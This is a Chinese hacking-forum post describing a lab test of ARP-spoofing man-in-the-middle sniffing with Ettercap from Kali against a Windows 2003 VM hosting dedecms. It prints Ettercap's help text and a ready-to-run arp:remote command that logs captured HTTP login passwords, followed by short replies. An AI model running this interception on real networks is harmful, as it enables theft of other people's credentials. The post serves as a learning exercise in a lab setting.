切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
Ettercap进行arp嗅探测试[复制链接]
发表于 2015-6-8 03:19:38 | 显示全部楼层 |!read_mode!

Ettercap进行arp嗅探测试        

一年了,去年暑假还在论坛学习linux,linux那个板块看了十篇文章就GG了,由于个人原因没办法一直在论坛,现在又可以来学习了,小菜linux一直荒废在那,一直想学linux入侵,内网渗透,帖子没啥技术含量,我是菜鸟,只是想来学点东西

0x01 环境

win03虚拟机(靶机),Kali linux 虚拟机

0x02 测试方法

root@kali:~# ettercap -v


ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team


ettercap 0.8.0

root@kali:~# ettercap -h


ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team



Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]


TARGET is in the format MAC/IP/PORTs (see the man for further detail)


Sniffing and Attack options:

  -M, --mitm <METHOD:ARGS>    perform a mitm attack

  -o, --only-mitm             don't sniff, only perform the mitm attack

  -b, --broadcast             sniff packets destined to broadcast

  -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)

  -p, --nopromisc             do not put the iface in promisc mode

  -S, --nosslmitm             do not forge SSL certificates

  -u, --unoffensive           do not forward packets

  -r, --read <file>           read data from pcapfile <file>

  -f, --pcapfilter <string>   set the pcap filter <string>

  -R, --reversed              use reversed TARGET matching

  -t, --proto <proto>         sniff only this proto (default is all)

      --certificate <file>    certificate file to use for SSL MiTM

      --private-key <file>    private key file to use for SSL MiTM


User Interface Type:

  -T, --text                  use text only GUI

       -q, --quiet                 do not display packet contents

       -s, --script <CMD>          issue these commands to the GUI

  -C, --curses                use curses GUI

  -D, --daemon                daemonize ettercap (no GUI)

  -G, --gtk                   use GTK+ GUI


Logging options:

  -w, --write <file>          write sniffed data to pcapfile <file>

  -L, --log <logfile>         log all the traffic to this <logfile>

  -l, --log-info <logfile>    log only passive infos to this <logfile>

  -m, --log-msg <logfile>     log all the messages to this <logfile>

  -c, --compress              use gzip compression on log files


Visualization options:

  -d, --dns                   resolves ip addresses into hostnames

  -V, --visual <format>       set the visualization format

  -e, --regex <regex>         visualize only packets matching this regex

  -E, --ext-headers           print extended header for every pck

  -Q, --superquiet            do not display user and password


General options:

  -i, --iface <iface>         use this network interface

  -I, --liface                show all the network interfaces

  -Y, --secondary <ifaces>    list of secondary network interfaces

  -n, --netmask <netmask>     force this <netmask> on iface

  -A, --address <address>     force this local <address> on iface

  -P, --plugin <plugin>       launch this <plugin>

  -F, --filter <file>         load the filter <file> (content filter)

  -z, --silent                do not perform the initial ARP scan

  -j, --load-hosts <file>     load the hosts list from <file>

  -k, --save-hosts <file>     save the hosts list to <file>

  -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)

  -a, --config <config>       use the alterative config file <config>


Standard options:

  -v, --version               prints the version and exit

  -h, --help                  this help screen

靶机IP 192.168.0.114 上面搭建的dedecms

root@kali:~# ettercap -i eth0 -m /tmp/arp.txt -T -M arp:remote /192.168.0.114/80 //

-m是嗅探结果到tmp目录下arp.txt文件

-i是网卡 /80是端口,当然你也可以写别的端口嗅探其他端口的信息

我们这边访问下win03靶机上的网站



再看这边嗅探记录的

成功捕获密码

针对某些嗅探不到的可以自己配置conf文件里面的密码表段,比如帝国的认证码loginauth,都可以嗅探的到,刚学linux下的工具,很多东西也不是很清楚,有错误希望大家指出来,有学习资料也希望贡献一份,谢谢。。


附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
发表于 2015-6-8 17:13:41 | 显示全部楼层
6666  玩kali遇到不懂的问题了  请教你
发表于 2015-7-19 11:35:20 | 显示全部楼层
你确定在实际环境中能用?
发表于 2015-7-20 17:10:55 | 显示全部楼层
楼主什么时候做个ssltrip +ettercap嗅探https的 就不错!
发表于 2015-8-26 14:10:02 | 显示全部楼层
看看支持下

代码区

GMT+8, 2019-11-23 08:01

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部